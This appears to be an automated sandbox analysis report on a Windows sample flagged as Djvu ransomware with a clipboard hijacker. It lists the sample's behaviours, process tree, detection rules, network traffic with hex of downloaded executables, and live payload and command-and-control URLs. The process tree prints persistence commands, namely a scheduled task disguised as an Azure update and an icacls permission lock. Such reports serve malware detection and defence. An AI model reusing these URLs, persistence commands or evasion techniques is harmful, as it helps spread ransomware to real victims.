Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Ln0LqSBLhS.exe

Overview

General Information

Sample Name:Ln0LqSBLhS.exe
Analysis ID:473798
MD5:d600beac1e021639e589dd8cc6e428eb
SHA1:d9e3e698d0a77905e6b577bbfdf1200a53f93af1
SHA256:051a2902c6a41210cbf84e97a4d24b7f4538414c25433e2e75ad0b6c9f7bf481
Tags:exeRansomwareStop
Infos:

Most interesting Screenshot:

Detection

Clipboard Hijacker Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Found ransom note / readme
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected Clipboard Hijacker
Multi AV Scanner detection for submitted file
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Writes many files with high entropy
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

Process Tree

  • System is w10x64
  • Ln0LqSBLhS.exe (PID: 6484 cmdline: 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' MD5: D600BEAC1E021639E589DD8CC6E428EB)
    • Ln0LqSBLhS.exe (PID: 6536 cmdline: 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' MD5: D600BEAC1E021639E589DD8CC6E428EB)
      • icacls.exe (PID: 6600 cmdline: icacls 'C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749' /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
      • Ln0LqSBLhS.exe (PID: 6632 cmdline: 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTask MD5: D600BEAC1E021639E589DD8CC6E428EB)
        • Ln0LqSBLhS.exe (PID: 6664 cmdline: 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTask MD5: D600BEAC1E021639E589DD8CC6E428EB)
          • build3.exe (PID: 4308 cmdline: 'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe' MD5: 0FEA771099E342FACD95A9D659548919)
            • build3.exe (PID: 4804 cmdline: 'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe' MD5: 0FEA771099E342FACD95A9D659548919)
              • schtasks.exe (PID: 720 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
                • conhost.exe (PID: 808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Ln0LqSBLhS.exe (PID: 6672 cmdline: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe --Task MD5: D600BEAC1E021639E589DD8CC6E428EB)
    • Ln0LqSBLhS.exe (PID: 6780 cmdline: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe --Task MD5: D600BEAC1E021639E589DD8CC6E428EB)
  • mstsca.exe (PID: 4856 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
    • mstsca.exe (PID: 6500 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
      • schtasks.exe (PID: 6536 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
  • mstsca.exe (PID: 6676 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
    • mstsca.exe (PID: 4952 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
  • mstsca.exe (PID: 1256 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
    • mstsca.exe (PID: 6960 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 0FEA771099E342FACD95A9D659548919)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0xe23ea:$s1: http://
  • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b4f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10472f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe23ea:$f1: http://
00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
    • 0xe23ea:$s1: http://
    • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x100b4f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x10472f:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
    • 0xe23ea:$f1: http://
    00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      0000001C.00000001.353651937.0000000000400000.00000040.00020000.sdmpJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
        Click to see the 27 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        27.2.mstsca.exe.33e15a0.1.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
          32.2.mstsca.exe.400000.0.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
            32.1.mstsca.exe.400000.0.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
              32.2.mstsca.exe.400000.0.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
                28.1.mstsca.exe.400000.0.raw.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
                  Click to see the 49 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for URL or domainShow sources
                  Source: http://securebiz.org/dl/build2.exe$runAvira URL Cloud: Label: malware
                  Source: http://securebiz.org/dl/build2.exeAvira URL Cloud: Label: malware
                  Source: http://securebiz.org/dl/build2.exerunAvira URL Cloud: Label: malware
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: Ln0LqSBLhS.exeVirustotal: Detection: 42%Perma Link
                  Source: Ln0LqSBLhS.exeMetadefender: Detection: 17%Perma Link
                  Source: Ln0LqSBLhS.exeReversingLabs: Detection: 58%
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: http://astdg.top/files/1/build3.exeVirustotal: Detection: 21%Perma Link
                  Machine Learning detection for sampleShow sources
                  Source: Ln0LqSBLhS.exeJoe Sandbox ML: detected
                  Source: 23.1.mstsca.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                  Source: 32.2.mstsca.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                  Source: 28.1.mstsca.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                  Source: 32.1.mstsca.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                  Source: 12.2.build3.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                  Source: 28.2.mstsca.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                  Source: 23.2.mstsca.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_0040E870
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_0040EAA0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,3_2_00410FC0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,6_2_0040E870
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,6_2_0040EAA0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,6_2_00410FC0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00411178 CryptDestroyHash,CryptReleaseContext,6_2_00411178
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.340207675.00000000030ED000.00000004.00000001.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
                  Source: Ln0LqSBLhS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\_readme.txtJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\_readme.txtJump to behavior
                  Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49709 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49712 version: TLS 1.2
                  Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: Ln0LqSBLhS.exe, Ln0LqSBLhS.exe, 00000007.00000002.248521541.0000000003C10000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmp
                  Source: Binary string: C:\yeget44\judayo-cizuf\cadoroyayif.pdb source: build3.exe, 0000000B.00000000.276012594.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 00000013.00000000.287490535.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 00000017.00000000.294848822.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 0000001B.00000002.354063122.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 0000001F.00000000.467834349.0000000000421000.00000002.00020000.sdmp
                  Source: Binary string: 2C:\yeget44\judayo-cizuf\cadoroyayif.pdb source: build3.exe, 0000000B.00000000.276012594.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 00000013.00000000.287490535.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 00000017.00000000.294848822.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 0000001B.00000002.354063122.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 0000001F.00000000.467834349.0000000000421000.00000002.00020000.sdmp
                  Source: Binary string: C:\gam\wozopikite\dikuxiv_toduguy\yifa_h.pdb source: Ln0LqSBLhS.exe
                  Source: Binary string: .>:C:\gam\wozopikite\dikuxiv_toduguy\yifa_h.pdb0 source: Ln0LqSBLhS.exe
                  Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: Ln0LqSBLhS.exe, 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000003.00000001.234275088.0000000000400000.00000040.00020000.sdmp, Ln0LqSBLhS.exe, 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmp, Ln0LqSBLhS.exe, 00000007.00000002.248521541.0000000003C10000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmp
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00410160
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_0040F730
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_0040F730
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_00410160

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.3:49710 -> 203.228.9.102:80
                  Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.3:49716 -> 94.190.187.102:80
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Aug 2021 08:14:18 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Sun, 29 Aug 2021 14:56:13 GMTETag: "94600-5cab3eaf5b635"Accept-Ranges: bytesContent-Length: 607744Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8f 0c 29 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 08 00 00 58 96 01 00 00 00 00 2f 22 00 00 00 10 00 00 00 50 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 9e 01 00 04 00 00 47 72 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 85 08 00 3c 00 00 00 00 60 9d 01 40 ab 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 52 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 6e 08 00 18 00 00 00 60 6e 08 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 08 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c9 35 08 00 00 10 00 00 00 36 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc 3f 00 00 00 50 08 00 00 40 00 00 00 3a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c c5 94 01 00 90 08 00 00 20 00 00 00 7a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 ab 00 00 00 60 9d 01 00 ac 00 00 00 9a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Aug 2021 08:14:00 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Fri, 30 Jul 2021 22:50:56 GMTETag: "53c00-5c85f0d6fa061"Accept-Ranges: bytesContent-Length: 343040Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 61 35 58 74 00 5b 0b 74 00 5b 0b 74 00 5b 0b 6a 52 ce 0b 61 00 5b 0b 6a 52 d8 0b 08 00 5b 0b 6a 52 df 0b 4c 00 5b 0b 53 c6 20 0b 73 00 5b 0b 74 00 5a 0b e5 00 5b 0b 6a 52 d1 0b 75 00 5b 0b 6a 52 cf 0b 75 00 5b 0b 6a 52 ca 0b 75 00 5b 0b 52 69 63 68 74 00 5b 0b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 37 c9 da 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 fa 01 00 00 ac e2 02 00 00 00 00 c0 1b 00 00 00 10 00 00 00 10 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 e4 02 00 04 00 00 e2 55 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 95 02 00 50 00 00 00 00 40 e3 02 f0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e3 02 34 1a 00 00 60 12 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 18 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 f9 01 00 00 10 00 00 00 fa 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 91 00 00 00 10 02 00 00 92 00 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 8c e0 02 00 b0 02 00 00 12 01 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 56 00 00 00 40 e3 02 00 58 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 40 01 00 00 a0 e3 02 00 42 01 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://aka.ms/arb-agreement-1
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://aka.ms/exporting
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://aka.ms/mpegla
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.283201319.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://aka.ms/thirdpartynotices
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.306377525.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://angularjs.org
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.310245278.000000000089F000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/fhsgtsspen6/get.php
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.310170996.000000000086A000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/fhsgtsspen6/get.php3
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.310225336.0000000000881000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.314996504.000000000930C000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/files/1/build3.exe
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.310170996.000000000086A000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/files/1/build3.exe$run
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.310170996.000000000086A000.00000004.00000001.sdmpString found in binary or memory: http://astdg.top/files/1/build3.exerun
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.274317927.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.269360471.00000000099D0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.304623285.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
                  Source: Ln0LqSBLhS.exe, 00000009.00000003.251012559.000000000089F000.00000004.00000001.sdmpString found in binary or memory: http://crl.como
                  Source: Ln0LqSBLhS.exe, 00000003.00000003.236225725.00000000007B9000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.co
                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241460701.00000000007B9000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACer
